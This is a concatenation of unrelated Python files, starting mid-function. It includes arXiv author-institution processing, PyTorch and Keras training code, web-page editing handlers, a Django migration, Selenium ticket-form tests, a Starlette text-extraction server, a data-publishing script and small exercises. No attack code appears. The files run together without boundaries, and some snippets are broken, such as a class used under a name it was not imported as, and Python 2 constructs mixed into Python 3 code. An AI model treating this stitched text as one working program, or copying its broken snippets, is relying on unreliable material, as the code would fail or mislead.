revised_rows.append(add_author(art_data, _id, "deepmind")) else: revised_rows.append(add_author(art_data, _id, "deepmind")) institute_dm_revised = pd.concat(revised_rows) institute_dm_update = pd.concat( [ institute_deduped.loc[~institute_deduped["article_id"].isin(dm_papers)], institute_dm_revised, ] ).reset_index(drop=True) revised_rows = [] logging.info("Updating OpenAI") institute_oai = institute_dm_update.loc[ institute_dm_update["article_id"].isin(oai_papers) ] # We loop over articles and add OpenAI as participant institution for _id in set(institute_oai["article_id"]): art_data = institute_oai.query(f"article_id == '{_id}'") revised_rows.append(add_author(art_data, _id, "openai")) institute_oai_revised = pd.concat(revised_rows) institute_final = pd.concat( [ institute_dm_update.loc[ ~institute_dm_update["article_id"].isin(oai_papers) ], institute_oai_revised, ] ).reset_index(drop=True) return institute_final def get_arxiv_papers(): return pd.read_csv( f"{PROJECT_DIR}/inputs/data/arxiv_ai_papers", dtype={"article_id": str} ) def get_arxiv_institutes(processed=True): if processed is True: proc_path = f"{PROJECT_DIR}/inputs/data/arxiv_institute_processed.csv" if os.path.exists(proc_path) is True: return pd.read_csv(proc_path, dtype={"article_id": str}) else: logging.info("Processing and saving article - institutes") art_inst_proc = make_institute_article_table().drop( axis=1, labels=["grid_id"] ) art_inst_proc.to_csv(proc_path, index_label=False) return art_inst_proc else: return pd.read_csv( f"{PROJECT_DIR}/inputs/data/arxiv_institutes.csv", dtype={"article_id": str} ) # -*- coding: utf-8 -*- """ description: Dataset Utils """ import numpy as np import torch from torch.utils.data.dataloader import default_collate def collate_fn(batch): transposed = zip(*batch) # imgs = default_collate(transposed[0]) lbl = default_collate(transposed[1]) images = transposed[0] num_images = len(images) shapes = transposed[3] max_shape = int(np.max(np.max(shapes, axis=0))) imgs = torch.zeros(num_images, 3, max_shape, max_shape) for i in xrange(num_images): img_size = images[i].size() imgs[i, :, 0:img_size[1], 0:img_size[2]] = images[i] boxes = [] box = transposed[2] for i in xrange(len(transposed[2])): boxes += [[i] + b.tolist() for b in box[i]] boxes = np.array(boxes) shapes = default_collate(transposed[3]) return imgs, lbl, boxes, shapes def test_collate_fn(batch): transposed = zip(*batch) # imgs = default_collate(transposed[0]) images = transposed[0] num_images = len(images) shapes = transposed[2] max_shape = int(np.max(np.max(shapes, axis=0))) imgs = torch.zeros(num_images, 3, max_shape, max_shape) for i in xrange(num_images): img_size = images[i].size() imgs[i, :, 0:img_size[1], 0:img_size[2]] = images[i] boxes = [] box = transposed[1] for i in xrange(len(box)): boxes += [[i] + b.tolist() for b in box[i]] boxes = np.array(boxes) shapes = default_collate(shapes) return imgs, boxes, shapes examples/nas/search_efficientnet.py1-10 import math import autogluon.core as ag from autogluon.mxnet.optimizer import SGD from autogluon.extra.model_zoo import EfficientNet from autogluon.vision import ImagePredictor as task @ag.obj( width_coefficient=ag.Categorical(1.1, 1.2), depth_coefficient=ag.Categorical(1.1, 1.2), ) class EfficientNetB1(EfficientNet): def __init__(self, width_coefficient, depth_coefficient): input_factor = math.sqrt(2.0 / (width_coefficient ** 2) / depth_coefficient) input_size = math.ceil((224 * input_factor) / 32) * 32 super().__init__(width_coefficient=width_coefficient, depth_coefficient=depth_coefficient, input_size=input_size) classifier = ImagePredictor() classifier.fit('imagenet', hyperparameters={ 'net':EfficientNetB1(), 'search_strategy': 'grid', 'optimizer': SGD(learning_rate=1e-1, momentum=0.9, wd=1e-4), 'batch_size': 32 }) print(classifier.fit_summary()) "Functions implementing FilePage editing" from ... import ValidateError, FailPage, ServerError from ....ski.project_class_definition import SectionData from ... import skilift from ....skilift import editpage from .. import utils def retrieve_edit_filepage(skicall): "Retrieves widget data for the edit file page" call_data = skicall.call_data pd = call_data['pagedata'] # clears any session data, keeping page_number, pchange and any status message utils.clear_call_data(call_data, keep=["page_number", "pchange", "status"]) project = call_data['editedprojname'] if 'page_number' in call_data: pagenumber = call_data['page_number'] str_pagenumber = str(pagenumber) else: raise FailPage(message = "page missing") if not pagenumber: raise FailPage(message = "Invalid page") try: pageinfo = skilift.page_info(project, pagenumber) if pageinfo.item_type != 'FilePage': raise FailPage(message = "Invalid page") call_data['pchange'] = pageinfo.change filepath, mimetype = editpage.file_parameters(project, pagenumber) except ServerError as e: raise FailPage(message = e.message) # fill in sections sd_adminhead = SectionData("adminhead") sd_page_edit = SectionData("page_edit") # fills in the data for editing page name, brief, parent, etc., sd_adminhead["page_head","large_text"] = pageinfo.name sd_page_edit['p_ident','page_ident'] = (project,str_pagenumber) sd_page_edit['p_name','page_ident'] = (project,str_pagenumber) sd_page_edit['p_description','page_ident'] = (project,str_pagenumber) sd_page_edit['p_rename','input_text'] = pageinfo.name sd_page_edit['p_parent','input_text'] = "%s,%s" % (project, pageinfo.parentfolder_number) sd_page_edit['p_brief','input_text'] = pageinfo.brief pd.update(sd_adminhead) pd.update(sd_page_edit) pd['p_file','input_text'] = filepath pd['p_mime','input_text'] = mimetype pd['enable_cache','radio_checked'] = pageinfo.enable_cache def submit_new_filepath(skicall): "Sets new page filepath" call_data = skicall.call_data project = call_data['editedprojname'] if 'page_number' in call_data: pagenumber = call_data['page_number'] else: raise FailPage(message = "page missing") if not pagenumber: raise FailPage(message = "Invalid page") pchange = call_data['pchange'] if not 'filepath' in call_data: raise FailPage(message="No filepath given") new_filepath = call_data['filepath'] if not new_filepath: raise FailPage(message="No filepath given") try: call_data['pchange'] = editpage.page_filepath(project, pagenumber, pchange, new_filepath) except ServerError as e: raise FailPage(message=e.message) call_data['status'] = 'Page filepath set: %s' % (new_filepath,) def submit_mimetype(skicall): "Sets mimetype" call_data = skicall.call_data project = call_data['editedprojname'] if 'page_number' in call_data: pagenumber = call_data['page_number'] else: raise FailPage(message = "page missing") if not pagenumber: raise FailPage(message = "Invalid page") pchange = call_data['pchange'] if not 'mime_type' in call_data: raise FailPage(message="No mimetype given") # Set the page mimetype try: call_data['pchange'] = editpage.page_mimetype(project, pagenumber, pchange, call_data['mime_type']) except ServerError as e: raise FailPage(message=e.message) call_data['status'] = 'Mimetype set' def submit_cache(skicall): "Sets cache true or false" call_data = skicall.call_data # this function is duplicated in editpage, may be better to remove this file and transfer conetents to editpage project = call_data['editedprojname'] pagenumber = call_data['page_number'] pchange = call_data['pchange'] if 'cache' not in call_data: raise FailPage(message="No cache instruction given") try: # Set the page cache if call_data['cache'] == 'True': enable_cache = True message = "Cache Enabled" else: enable_cache = False message = "Cache Disabled" call_data['pchange'] = editpage.page_enable_cache(project, pagenumber, pchange, enable_cache) except ServerError as e: raise FailPage(message=e.message) call_data['status'] = message # Generated by Django 2.1 on 2019-08-21 13:03 from django.db import migrations, models class Migration(migrations.Migration): initial = True dependencies = [ ] operations = [ migrations.CreateModel( name='AboutDescription', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('title', models.CharField(max_length=100)), ('description', models.CharField(max_length=1000)), ('image', models.ImageField(upload_to='images/aboutusImage')), ], ), migrations.CreateModel( name='Contact', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name', models.CharField(max_length=200)), ('email', models.CharField(max_length=50)), ('subject', models.CharField(max_length=100)), ('phone', models.CharField(max_length=50)), ('message', models.TextField(blank=True)), ], ), migrations.CreateModel( name='OurServices', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('serviceName', models.CharField(max_length=50)), ], ), migrations.CreateModel( name='TeamInfo', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('firstName', models.CharField(max_length=50)), ('lastName', models.CharField(max_length=50)), ('designation', models.CharField(max_length=50)), ('profilePic', models.ImageField(upload_to='images/teamProfile')), ('facebookLink', models.CharField(max_length=100)), ('twitterLink', models.CharField(max_length=100)), ('linkedInLink', models.CharField(max_length=100)), ], ), ] import pytest from seleniumbase import BaseCase from qa327_test.conftest import base_url from unittest.mock import patch from qa327.models import db, User, TicketInfo from werkzeug.security import generate_password_hash, check_password_hash """ This file defines unit tests for the frontend homepage. The tests will only test the frontend portion of the program, by patching the backend to return specfic values. For example: @patch('qa327.backend.get_user', return_value=test_user) Will patch the backend get_user function (within the scope of the current test case) so that it return 'test_user' instance below rather than reading the user from the database. Annotate @patch before unit tests can mock backend methods (for that testing function) """ # Mock a smple user (login) test_user_login = User( email='', name='LetsTestL', password=generate_password_hash('!'), balance=10000 ) # Moch some sample tickets test_tickets = TicketInfo( email='', name='t1', quantity=1, price=100, date='20210408' ) class TestR5(BaseCase): # Test Case R5.0.1 @pytest.mark.timeout(60) @patch('qa327.backend.get_user', return_value=test_user_login) @patch('qa327.backend.get_ticket', return_value=test_tickets) def test_positive_update(self, *_): """ Checking for positive case for the fields of ticket's update form with lower boundaries """ # open logout page to invalid any logged-in sessions that may exist, then open login page self.open(base_url + '/logout') self.open(base_url + '/') # test that redirection to /login has occurred # fill email and password self.type("#email", test_user_login.email) self.type("#password", "!") # click enter button self.click('input[type="submit"]') # enter update ticket form with low values self.type("#name_update", "t1") self.type("#quantity_update", "1") self.type("#price_update", "10") self.type("#expdate_update", "20210901") # click update button self.click('input[value="Update"]') # assert no error text appears self.assert_text_not_visible("Ticket name must be alphanumeric-only", "#message") # TODO update these asserts self.assert_text_not_visible("Ticket name cannot begin with a space", "#message") self.assert_text_not_visible("Ticket name cannot end with a space", "#message") self.assert_text_not_visible("Ticket name cannot be longer than 60 characters", "#message") self.assert_text_not_visible("At least 1 ticket must be sold", "#message") self.assert_text_not_visible("At most 100 tickets can be sold", "#message") self.assert_text_not_visible("Price of the ticket cannot be below 10", "#message") self.assert_text_not_visible("Price of the ticket cannot be above 100", "#message") self.assert_text_not_visible("Expiration date is in invalid format", "#message") # open logout (for cleanup) self.open(base_url + '/logout') # Test Case R5.0.1 @pytest.mark.timeout(60) @patch('qa327.backend.get_user', return_value=test_user_login) @patch('qa327.backend.get_ticket', return_value=test_tickets) def test_positive_update2(self, *_): """ Checking for positive case for the fields of ticket's update form with upper boundaries """ # open logout page to invalid any logged-in sessions that may exist, then open login page self.open(base_url + '/logout') self.open(base_url + '/') # test that redirection to /login has occurred # fill email and password self.type("#email", test_user_login.email) self.type("#password", "!") # click enter button self.click('input[type="submit"]') # enter update ticket form with high values self.type("#name_update", "t1") self.type("#quantity_update", "100") self.type("#price_update", "100") self.type("#expdate_update", "20210901") # click update button self.click('input[value="Update"]') # assert no error text appears self.assert_text_not_visible("Ticket name must be alphanumeric-only", "#message") self.assert_text_not_visible("Ticket name cannot begin with a space", "#message") self.assert_text_not_visible("Ticket name cannot end with a space", "#message") self.assert_text_not_visible("Ticket name cannot be longer than 60 characters", "#message") # TODO update these asserts self.assert_text_not_visible("At most 100 tickets can be sold", "#message") self.assert_text_not_visible("Price of the ticket cannot be below 10", "#message") self.assert_text_not_visible("Price of the ticket cannot be above 100", "#message") self.assert_text_not_visible("Expiration date is in invalid format", "#message") # open logout (for cleanup) self.open(base_url + '/logout') # Test Case R5.1.1 @pytest.mark.timeout(60) @patch('qa327.backend.get_user', return_value=test_user_login) @patch('qa327.backend.get_ticket', return_value=test_tickets) def test_alphanumeric_only(self, *_): """ Check if name of the ticket is alphanumeric-only """ # open logout page to invalid any logged-in sessions that may exist, then open login page self.open(base_url + '/logout') self.open(base_url + '/') # test that redirection to /login has occurred # fill email and password self.type("#email", test_user_login.email) self.type("#password", "!") # click enter button self.click('input[type="submit"]') # enter update ticket form with low values self.type("#name_update", "Ht1&t2@!*\")(/.,<>[]-+") self.type("#quantity_update", "1") self.type("#price_update", "15") self.type("#expdate_update", "20210901") # click update button self.click('input[value="Update"]') # assert proper error message self.assert_text("The name of the ticket has to be alphanumeric-only, and space allowed only if it is not the " "first or the last character.", "#update_message") # open logout (for cleanup) self.open(base_url + '/logout') # Test Case R5.1.2 @pytest.mark.timeout(60) @patch('qa327.backend.get_user', return_value=test_user_login) @patch('qa327.backend.get_ticket', return_value=test_tickets) def test_spaces_only(self, *_): """ Check space is not allowed as first character """ # open logout page to invalid any logged-in sessions that may exist, then open login page self.open(base_url + '/logout') self.open(base_url + '/') # test that redirection to /login has occurred # fill email and password self.type("#email", test_user_login.email) self.type("#password", "!") # click enter button self.click('input[type="submit"]') # enter update ticket form with low values self.type("#name_update", " t1") self.type("#quantity_update", "1") self.type("#price_update", "15") self.type("#expdate_update", "20210901") # click update button self.click('input[value="Update"]') # assert proper error message self.assert_text("The name of the ticket has to be alphanumeric-only, and space allowed only if it is not the " "first or the last character.", "#update_message") # open logout (for cleanup) self.open(base_url + '/logout') # Test Case R5.1.3 @pytest.mark.timeout(60) @patch('qa327.backend.get_user', return_value=test_user_login) @patch('qa327.backend.get_ticket', return_value=test_tickets) def test_spaces_only2(self, *_): """ Check space is not allowed as last character """ # open logout page to invalid any logged-in sessions that may exist, then open login page self.open(base_url + '/logout') self.open(base_url + '/') # test that redirection to /login has occurred # fill email and password self.type("#email", test_user_login.email) self.type("#password", "!") # click enter button self.click('input[type="submit"]') # enter update ticket form with low values self.type("#name_update", "t1 ") self.type("#quantity_update", "1") self.type("#price_update", "15") self.type("#expdate_update", "20210901") # click update button self.click('input[value="Update"]') # assert proper error message self.assert_text("The name of the ticket has to be alphanumeric-only, and space allowed only if it is not the " "first or the last character.", "#update_message") # open logout (for cleanup) self.open(base_url + '/logout') # Test Case R5.2.1 @pytest.mark.timeout(60) @patch('qa327.backend.get_user', return_value=test_user_login) @patch('qa327.backend.get_ticket', return_value=test_tickets) def test_name_length(self, *_): """ The name of the ticket is no longer than 60 characters """ # open logout page to invalid any logged-in sessions that may exist, then open login page self.open(base_url + '/logout') self.open(base_url + '/') # test that redirection to /login has occurred # fill email and password self.type("#email", test_user_login.email) self.type("#password", "!") # click enter button self.click('input[type="submit"]') # enter update ticket form with low values self.type("#name_update", "abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyzabcdefghi") self.type("#quantity_update", "1") self.type("#price_update", "15") self.type("#expdate_update", "20210901") # click update button self.click('input[value="Update"]') # assert proper error message self.assert_text("Ticket name cannot be longer than 60 characters", "#update_message") # open logout (for cleanup) self.open(base_url + '/logout') # Test Case R5.3.1 @pytest.mark.timeout(60) @patch('qa327.backend.get_user', return_value=test_user_login) @patch('qa327.backend.get_ticket', return_value=test_tickets) def test_quantity_bound(self, *_): """ The quantity of the tickets has to be more than 0 """ # open logout page to invalid any logged-in sessions that may exist, then open login page self.open(base_url + '/logout') self.open(base_url + '/') # test that redirection to /login has occurred # fill email and password self.type("#email", test_user_login.email) self.type("#password", "!") # click enter button self.click('input[type="submit"]') # enter update ticket form with low values self.type("#name_update", "t1") self.type("#quantity_update", "0") self.type("#price_update", "15") self.type("#expdate_update", "20210901") # click update button self.click('input[value="Update"]') # assert proper error message self.assert_text("The quantity of the tickets has to be more than 0, and less than or equal to 100.", "#update_message") # open logout (for cleanup) self.open(base_url + '/logout') # Test Case R5.3.2 @pytest.mark.timeout(60) @patch('qa327.backend.get_user', return_value=test_user_login) @patch('qa327.backend.get_ticket', return_value=test_tickets) def test_quantity_bound2(self, *_): """ The quantity of the tickets has to be less than or equal to 100 """ # open logout page to invalid any logged-in sessions that may exist, then open login page self.open(base_url + '/logout') self.open(base_url + '/') # test that redirection to /login has occurred # fill email and password self.type("#email", test_user_login.email) self.type("#password", "!") # click enter button self.click('input[type="submit"]') # enter update ticket form with low values self.type("#name_update", "t1") self.type("#quantity_update", "101") self.type("#price_update", "15") self.type("#expdate_update", "20210901") # click update button self.click('input[value="Update"]') # assert proper error message self.assert_text("The quantity of the tickets has to be more than 0, and less than or equal to 100.", "#update_message") # open logout (for cleanup) self.open(base_url + '/logout') # Test Case R5.4.1 @pytest.mark.timeout(60) @patch('qa327.backend.get_user', return_value=test_user_login) @patch('qa327.backend.get_ticket', return_value=test_tickets) def test_price_bound(self, *_): """ Price cannot be lower than 10 """ # open logout page to invalid any logged-in sessions that may exist, then open login page self.open(base_url + '/logout') self.open(base_url + '/') # test that redirection to /login has occurred # fill email and password self.type("#email", test_user_login.email) self.type("#password", "!") # click enter button self.click('input[type="submit"]') # enter update ticket form with low values self.type("#name_update", "t1") self.type("#quantity_update", "1") self.type("#price_update", "9") self.type("#expdate_update", "20210901") # click update button self.click('input[value="Update"]') # assert proper error message self.assert_text("Price has to be of range [10, 100]", "#update_message") # open logout (for cleanup) self.open(base_url + '/logout') # Test Case R5.4.2 @pytest.mark.timeout(60) @patch('qa327.backend.get_user', return_value=test_user_login) @patch('qa327.backend.get_ticket', return_value=test_tickets) def test_price_bound2(self, *_): """ Price cannot be higher than 100 """ # open logout page to invalid any logged-in sessions that may exist, then open login page self.open(base_url + '/logout') self.open(base_url + '/') # test that redirection to /login has occurred # fill email and password self.type("#email", test_user_login.email) self.type("#password", "!") # click enter button self.click('input[type="submit"]') # enter update ticket form with low values self.type("#name_update", "t1") self.type("#quantity_update", "1") self.type("#price_update", "101") self.type("#expdate_update", "20210901") # click update button self.click('input[value="Update"]') # assert proper error message self.assert_text("Price has to be of range [10, 100]", "#update_message") # open logout (for cleanup) self.open(base_url + '/logout') # Test Case R5.5.1 @pytest.mark.timeout(60) @patch('qa327.backend.get_user', return_value=test_user_login) @patch('qa327.backend.get_ticket', return_value=test_tickets) def test_date_format(self, *_): """ Date must be given in the format YYYYMMDD (e.g. 20200901) """ # open logout page to invalid any logged-in sessions that may exist, then open login page self.open(base_url + '/logout') self.open(base_url + '/') # test that redirection to /login has occurred # fill email and password self.type("#email", test_user_login.email) self.type("#password", "!") # click enter button self.click('input[type="submit"]') # enter update ticket form with low values self.type("#name_update", "t1") self.type("#quantity_update", "1") self.type("#price_update", "15") self.type("#expdate_update", "Sept. 9 2021") # click update button self.click('input[value="Update"]') # assert proper error message self.assert_text("Date must be given in the format YYYYMMDD (e.g. 20200901)", "#update_message") # open logout (for cleanup) self.open(base_url + '/logout') # Test Case R5.6.1 @pytest.mark.timeout(60) @patch('qa327.backend.get_user', return_value=test_user_login) def test_ticket_exist(self, *_): """ The ticket of the given name must exist """ # open logout page to invalid any logged-in sessions that may exist, then open login page self.open(base_url + '/logout') self.open(base_url + '/') # test that redirection to /login has occurred # fill email and password self.type("#email", test_user_login.email) self.type("#password", "!") # click enter button self.click('input[type="submit"]') # enter update ticket form with low values self.type("#name_update", "thisTicketNoExist") self.type("#quantity_update", "1") self.type("#price_update", "15") self.type("#expdate_update", "20210901") # click update button self.click('input[value="Update"]') # assert proper error message self.assert_text("The ticket of the given name must exist", "#update_message") # open logout (for cleanup) self.open(base_url + '/logout') # Test Case R5.7.1 @pytest.mark.timeout(60) @patch('qa327.backend.get_user', return_value=test_user_login) @patch('qa327.backend.get_ticket', return_value=test_tickets) def test_redirect_update(self, *_): """ For any errors, redirect back to / and show an error message """ # open logout page to invalid any logged-in sessions that may exist, then open login page self.open(base_url + '/logout') self.open(base_url + '/') # test that redirection to /login has occurred # fill email and password self.type("#email", test_user_login.email) self.type("#password", "!") # click enter button self.click('input[type="submit"]') # enter update ticket form with low values self.type("#name_update", "t1") self.type("#quantity_update", "1") self.type("#price_update", "15") self.type("#expdate_update", "Sept. 9 2021") # click update button self.click('input[value="Update"]') # assert proper header self.assert_element("#welcome-header") # open logout (for cleanup) self.open(base_url + '/logout') import os os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' # ignore tf warnings about cuda from keras.layers import Conv2D, MaxPooling2D, Dense, Flatten, GlobalAveragePooling2D, BatchNormalization, Dropout, Input, UpSampling2D from keras.metrics import CategoricalAccuracy from tensorflow.keras.preprocessing.image import ImageDataGenerator, array_to_img, img_to_array from sklearn.metrics import classification_report, matthews_corrcoef from keras.losses import CosineSimilarity, CategoricalCrossentropy from keras.callbacks import EarlyStopping, LearningRateScheduler from keras.models import Sequential from keras.optimizers import Adam from pandas import DataFrame import tensorflow as tf import numpy as np import random import sys from utils import make_graphs, print_to_file, load_fmnist_pickle GLOBAL_EPOCHS = 100 def scheduler(epoch, lr): lrmin=0.0001 lrmax=0.001 step_size = 10 max_iter = GLOBAL_EPOCHS delta = 10 clr = lrmin + ((lrmax-lrmin)*(1.-np.fabs((epoch/step_size)-(2*np.floor(epoch/(2*step_size)))-1.))) clr_decay = clr/(1.+((delta-1.)*(epoch/max_iter))) return clr_decay VERBOSE = 1 if not VERBOSE: print("Change verbose to 1 to see messages.") last_epochs = list() mccs = list() dicts = list() histories = list() items = [10, 50, 250, 500] patiences = [20, 20, 20, 15] batch_sizes = [24, 32, 32, 32] for index, item in enumerate(items): # Load the dataset x_train, y_train, x_test, y_test = load_fmnist_pickle(id=item) if VERBOSE: print("Shape after loading: ", x_train.shape, y_train.shape, x_test.shape, y_test.shape) seed_value = 0 # 1. Set the `PYTHONHASHSEED` environment variable at a fixed value os.environ['PYTHONHASHSEED']=str(seed_value) # 2. Set the `python` built-in pseudo-random generator at a fixed value random.seed(seed_value) # 3. Set the `numpy` pseudo-random generator at a fixed value np.random.seed(seed_value) # 4. Set the `tensorflow` pseudo-random generator at a fixed value tf.random.set_seed(seed_value) def add_channel(image): img = array_to_img(image, scale=False) #returns PIL Image img = img.convert(mode='RGB') #makes 3 channels arr = img_to_array(img) #convert back to array return arr x_train *= 255 x_test *= 255 x_train = [add_channel(img) for img in x_train] x_test = [add_channel(img) for img in x_test] x_train = np.asarray(x_train, dtype='float32') x_test = np.asarray(x_test, dtype='float32') print(x_train.shape) print(y_train.shape) epochs = GLOBAL_EPOCHS learning_rate = 0.001 patience = patiences[index] num_classes = y_test.shape[1] # build model model = Sequential() model.add(Input(shape=(28, 28, 3))) model.add(UpSampling2D(size=(8,8), interpolation='nearest')) # Load updated weights from official repository transfer_learning_model = tf.keras.applications.EfficientNetB0(include_top=False, input_shape=(224, 224, 3), weights='../cifar10/efficientnet-b0/efficientnetb0_notop.h5') for layer in transfer_learning_model.layers[:-6]: layer.trainable = False model.add(transfer_learning_model) model.add(GlobalAveragePooling2D()) model.add(BatchNormalization()) model.add(Dropout(0.5)) model.add(Dense(num_classes, activation='softmax')) model.compile(loss=CosineSimilarity(axis=1), optimizer=Adam(), metrics=[CategoricalAccuracy()]) if VERBOSE: model.summary() datagen = ImageDataGenerator(rotation_range=25, zoom_range=[0.85,1.0], width_shift_range=0.1, height_shift_range=0.1, horizontal_flip=True, fill_mode='nearest') earlyStop = EarlyStopping(monitor='val_loss', mode='min', patience=patience, verbose=VERBOSE) history = model.fit(datagen.flow(x=x_train, y=y_train, batch_size=batch_sizes[index], seed=seed_value), validation_data=(x_test, y_test), epochs=epochs, batch_size=batch_sizes[index], verbose=VERBOSE, callbacks=[earlyStop, LearningRateScheduler(scheduler)], validation_batch_size=2500) histories.append(history) model.save(f"models/combinedda-{item}.h5") predictions = model.predict(x_test) y_test = np.argmax(y_test, axis=1) predictions = np.argmax(predictions, axis=1) dicts.append(classification_report(y_true=y_test, y_pred=predictions, digits=3, output_dict=True)) mccs.append(matthews_corrcoef(y_true=y_test, y_pred=predictions)) last_epochs.append(len(history.history['loss'])) print_to_file(dicts, mccs, items, epochs, batch_sizes, learning_rate, patiences, last_epochs, model, 'combinedda') make_graphs(histories, items, 'combinedda')app/server.py import os import sys import aiohttp import asyncio import uvicorn from starlette.applications import Starlette from starlette.middleware.cors import CORSMiddleware from starlette.responses import JSONResponse import json import textract as txrct import tempfile from base64 import b64decode app = Starlette() app.add_middleware(CORSMiddleware, allow_origins=['*'], allow_headers=['X-Requested-With', 'Content-Type']) @app.route('/textract', methods=['POST']) async def textract(request): data = await request.body() data_json = json.loads(data) file_type = data_json['file_type'] file_dec = b64decode(data_json['data']) suffix = f'.{file_type}' with tempfile.NamedTemporaryFile(suffix=suffix, buffering=0) as t: t.write(file_dec) text = txrct.process(t.name) resp = {'text': text.decode('utf-8')} return JSONResponse(resp) @app.route('/status', methods=['GET']) def status(request): res = {'status': 'OK'} return JSONResponse(res) if __name__ == '__main__': if 'serve' in sys.argv: uvicorn.run(app=app, host='0.0.0.0', port=int(os.environ.get('PORT', 8080)), log_level="info")from django import template register = template.Library() @register.simple_tag def duration(td): total_seconds = int(td.total_seconds()) hours = total_seconds // 3600 minutes = (total_seconds % 3600) // 60 return '{} h {} min'.format(hours, minutes) nhsengland/publish-o-maticdatasets/phof/transform.py """ No longer required/used """ import datetime import json import sys import ffs import re from publish.lib.helpers import filename_for_resource, download_file from publish.lib.upload import Uploader DATA_DIR = None PHOF_SUMMARY = """The Public Health Outcomes Framework Healthy lives, healthy people: Improving outcomes and supporting transparency sets out a vision for public health, desired outcomes and the indicators that will help us understand how well public health is being improved and protected. The framework concentrates on two high-level outcomes to be achieved across the public health system, and groups further indicators into four 'domains' that cover the full spectrum of public health. The outcomes reflect a focus not only on how long people live, but on how well they live at all stages of life. The data published in the tool are the baselines for the Public Health Outcomes Framework, with more recent and historical trend data where these are available. The baseline period is 2010 or equivalent, unless these data are unavailable or not deemed to be of sufficient quality. A list of indicators updated, for the most recent and previous releases can be found in the Public Health Outcomes Framework Collection within www.gov.uk. Data are published as part of a quarterly update cycle in August, November, February and May. Exact dates will be announced on the www.gov.uk statistical release calendar and this website. Public Health Outcomes Framework baseline data will be revised and corrected in accordance with the Code of Practice for Official Statistics. To provide comments and suggestions please e-mail .""" def add_metadata_to_ascof_datasets(): metadata_file = DATA_DIR/'dataset.metadata.json' metadata = metadata_file.json_load() metadata['tags'] = ['PHOF', 'Public Health Outcomes Framework'] metadata['title'] ='PHOF - Public Health Outcomes Framework' metadata['frequency'] = 'yearly' metadata['summary'] = PHOF_SUMMARY metadata['source'] = 'http://www.phoutcomes.info/public-health-outcomes-framework' metadata['coverage_start_date'] = '2000-01-01' metadata['coverage_end_date'] = '2013-12-31' u = Uploader("phof") for resource in metadata['resources']: filename = filename_for_resource(resource) path = DATA_DIR / filename download_file(resource['url'], path) print "Uploading to S3" url = u.upload(path) resource['url'] = url u.close() metadata_file.truncate() metadata_file << json.dumps(metadata, indent=2) return def main(workspace): global DATA_DIR DATA_DIR = ffs.Path(workspace) / 'data' add_metadata_to_ascof_datasets() return 0 if __name__ == '__main__': sys.exit(main(ffs.Path.here())) ''' Url: https://www.hackerrank.com/challenges/nested-list/problem Name: Nested Lists ''' if __name__ == '__main__': students = {} for _ in range(int(input())): name = input() score = float(input()) if score in students.keys(): students[score].append(name) else: students[score] = [name] keys = list(students.keys()) keys.sort() lowest = students[keys[1]] lowest.sort() for name in lowest: print(name) from dbSetup import dbClasses as db managerClass = db.getDBClass('MANAGER') orgClass = db.getDBClass('ORG') def addManager(userName, pswd, email, orgID): newManager = managerClass(USERNAME = userName, PASSWORD = pswd, EMAIL_ID = email, ORG_ID = orgID) db.session.add(newManager) db.session.commit() import random import time from concurrent.futures import ThreadPoolExecutor from threading import Lock, Thread, current_thread sticks = [Lock() for _ in range(5)] # we put sleep to simulate blocking operation ,so the other thread will enter def philospher(n): time.sleep(random.random()) with sticks[n]: print(f"{current_thread()} ,thread {n} is equired first lock {n}") time.sleep(random.random()) with sticks[(n + 1) % 5]: print(f"{current_thread()} ,thread {n} is equired second lock {(n+1)%5}") print("eating", n) time.sleep(random.random()) print(f"{current_thread()} ,thread {n} is realse second lock {(n+1)%5}") print(f"{current_thread()} ,thread {n} is realse first lock {n}") pool = ThreadPoolExecutor() phils = [Thread(target=philospher, args=(n,)) for n in range(5)] # phils2 = [pool.submit(philospher, n) for n in range(5)] for p in phils: p.start() # Copyright 2020 The Private Cardinality Estimation Framework Authors # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Tests for wfa_cardinality_estimation_evaluation_framework.common.tests.plotting.""" from absl.testing import absltest import matplotlib import pandas as pd from wfa_cardinality_estimation_evaluation_framework.common import plotting def get_relative_error_by_num_sets(): return pd.DataFrame({ 'num_sets': [1, 1, 2, 1, 2, 2], 'relative_error': [0.05, -0.05, 0.1, 0.1, -0.1, -0.2]}) def get_df_for_test_barplot_frequency_distributions(): return pd.DataFrame({ 'run_index': [0, 0, 0, 0, 1, 1, 1, 1], 'cardinality_source': ['estimated_cardinality', 'estimated_cardinality', 'true_cardinality', 'true_cardinality'] * 2, 'frequency_level': [1, 2, 1, 2] * 2, 'cardinality_value': [12, 5, 10, 7, 8, 8, 10, 7] }) class PlottingTest(absltest.TestCase): def test_boxplot_relative_error_plot_xticks(self): df = get_relative_error_by_num_sets() ax = plotting.boxplot_relative_error( df, 'num_sets', 'relative_error') xlabels = [x.get_text() for x in ax.get_xticklabels()] expected = [str(x) for x in sorted(df['num_sets'].unique())] self.assertListEqual(xlabels, expected) def test_boxplot_relative_error_plot_returns(self): ax = plotting.boxplot_relative_error( get_relative_error_by_num_sets(), 'num_sets', 'relative_error') self.assertIsInstance(ax, matplotlib.axes.Axes) def test_boxplot_relative_error_plot_raise_column_not_found(self): msg = 'num_sets or relative_error not found in df.' with self.assertRaisesRegex(ValueError, msg): _ = plotting.boxplot_relative_error( get_relative_error_by_num_sets(), 'num_set', 'relative_error') with self.assertRaisesRegex(ValueError, msg): _ = plotting.boxplot_relative_error( get_relative_error_by_num_sets(), 'num_set', 'rel_err') def test_barplot_frequency_distributions_labels_correct(self): df = get_df_for_test_barplot_frequency_distributions() ax = plotting.barplot_frequency_distributions( df=df, frequency='frequency_level', cardinality='cardinality_value', source='cardinality_source') xlabels = [x.get_text() for x in ax.get_xticklabels()] self.assertListEqual(xlabels, ['1', '2'], 'The x-axis tick labels are not correct.') self.assertEqual(ax.get_xlabel(), 'Per frequency level', 'The x-axis label is not correct') 